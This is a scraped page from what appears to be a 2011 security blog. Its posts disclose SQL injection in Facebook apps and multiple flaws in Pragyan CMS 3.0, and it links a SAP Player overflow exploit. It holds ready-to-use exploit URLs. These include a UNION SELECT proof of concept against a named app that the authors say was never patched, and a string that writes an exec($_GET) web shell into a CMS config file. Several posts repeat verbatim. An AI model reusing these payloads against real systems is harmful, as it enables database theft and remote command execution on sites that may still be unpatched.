This exploit uses direct return address. Not SEH version
http://packetstormsecurity.org/files/view/102792/sapplayer-overflow.py.txt
http://packetstormsecurity.org/files/view/102792/sapplayer-overflow.py.txt
Tuesday, July 5, 2011
Monday, March 21, 2011
Another vulnerability in facebook apps!
This is second sql injection we found in facebook apps.
We tried to contact developers but got no response from them. So we decided to release the vulnerability.
Note:: There are few more facebook apps which we found are vulnerable to sql injection attacks. We are waiting for the developers to patch those. We will post them as soon as they are patched.
A Proof Of Concept of the vulnerability can be seen at::
http://apps.facebook.com/lucygames/game.php?gameid=-123%20UNION%20SELECT%20null,%28select%20concat%280x3a,unhex%28Hex%28cast%28group_concat%28table_name%29%20as%20char%29%29%29,0x3a%29%20FROM%20information_schema.tables%20Where%20table_schema=0x6C75637967616D6573%29,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
We tried to contact developers but got no response from them. So we decided to release the vulnerability.
Note:: There are few more facebook apps which we found are vulnerable to sql injection attacks. We are waiting for the developers to patch those. We will post them as soon as they are patched.
A Proof Of Concept of the vulnerability can be seen at::
http://apps.facebook.com/lucygames/game.php?gameid=-123%20UNION%20SELECT%20null,%28select%20concat%280x3a,unhex%28Hex%28cast%28group_concat%28table_name%29%20as%20char%29%29%29,0x3a%29%20FROM%20information_schema.tables%20Where%20table_schema=0x6C75637967616D6573%29,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--
Wednesday, March 9, 2011
Sql Injection in Facebook applications!
We found a vulnerability in 2 facebook applications. One is patched now so we are disclosing the vulnerability.
There was a SQL Injection vulnerability in apps.facebook.com
Vendor::twmarketplace
Location:: http://apps.facebook.com/twmarketplace/post.php?postid=
Severity:: Critical
Impact:: Database access/server control
It was possible to extract all data of all databases located on that servers
Changelog::
7/3/2010 - Facebook vendors notified
8/3/2010 - Response from verdor
8/3/2010 - Vendor patched the vulnerability
9/3/2010 - Public disclosure
There was a SQL Injection vulnerability in apps.facebook.com
Vendor::twmarketplace
Location:: http://apps.facebook.com/
Severity:: Critical
Impact:: Database access/server control
It was possible to extract all data of all databases located on that servers
Changelog::
7/3/2010 - Facebook vendors notified
8/3/2010 - Response from verdor
8/3/2010 - Vendor patched the vulnerability
9/3/2010 - Public disclosure
Saturday, February 26, 2011
Pragyan CMS v 3,0 mulltiple vulnerabilities!
During the Pragyan's hacking challange we found these vulnerabilities in their open source CMS.
#Pragyan CMS v 3.0 mutiple Vulnerabilities
#Author Villy and Abhishek Lyall - villys777[at]gmail[dot]com,
abhilyall[at]gmail[dot]com
#Web - http://www.aslitsecurity.com/
#Blog - http://bugix-security.blogspot.com
#http://www.aslitsecurity.blogspot.com/
#Pragyan CMS v 3.0
Technical Description
1) Code execution in INSTALL/install.php
script not correctly validate entered fields.
possibility to write at password field string:
");echo exec($_GET["a"]);echo ("
or in another fields with turned of javascript.
in cms/config.inc.php will be code:
define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");
which allows command execution.
EXPLOIT:: http://target.com/blog/cms/config.inc.php?a=ls -la
2) sql injection
- get mysql version EXPLOIT::
http://target.com/path/+view&thread_id=-1 UNION ALL SELECT
null,null,null,null,concat(unhex(Hex(cast(@@version as
char)))),null,null,null--
Solution
update to Pragyan CMS 3.0 rev.274
Changelog
2011-19-02 : Initial release
2011-20-02 : Reported to vendor
2011-25-02 : patch released
2011-25-02 : public disclose
Credits
Villy
Abhishek Lyall
pragyan.org
http://bugix-security.blogspot.com
http://www.aslitsecurity.blogspot.com/
Abhishek Lyall
#Pragyan CMS v 3.0 mutiple Vulnerabilities
#Author Villy and Abhishek Lyall - villys777[at]gmail[dot]com,
abhilyall[at]gmail[dot]com
#Web - http://www.aslitsecurity.com/
#Blog - http://bugix-security.blogspot.com
#http://www.aslitsecurity.blogspot.com/
#Pragyan CMS v 3.0
Technical Description
1) Code execution in INSTALL/install.php
script not correctly validate entered fields.
possibility to write at password field string:
");echo exec($_GET["a"]);echo ("
or in another fields with turned of javascript.
in cms/config.inc.php will be code:
define("MYSQL_PASSWORD","");echo exec($_GET["a"]);echo ("");
which allows command execution.
EXPLOIT:: http://target.com/blog/cms/config.inc.php?a=ls -la
2) sql injection
- get mysql version EXPLOIT::
http://target.com/path/+view&thread_id=-1 UNION ALL SELECT
null,null,null,null,concat(unhex(Hex(cast(@@version as
char)))),null,null,null--
Solution
update to Pragyan CMS 3.0 rev.274
Changelog
2011-19-02 : Initial release
2011-20-02 : Reported to vendor
2011-25-02 : patch released
2011-25-02 : public disclose
Credits
Villy
Abhishek Lyall
pragyan.org
http://bugix-security.blogspot.com
http://www.aslitsecurity.blogspot.com/
Abhishek Lyall
Subscribe to:
Posts (Atom)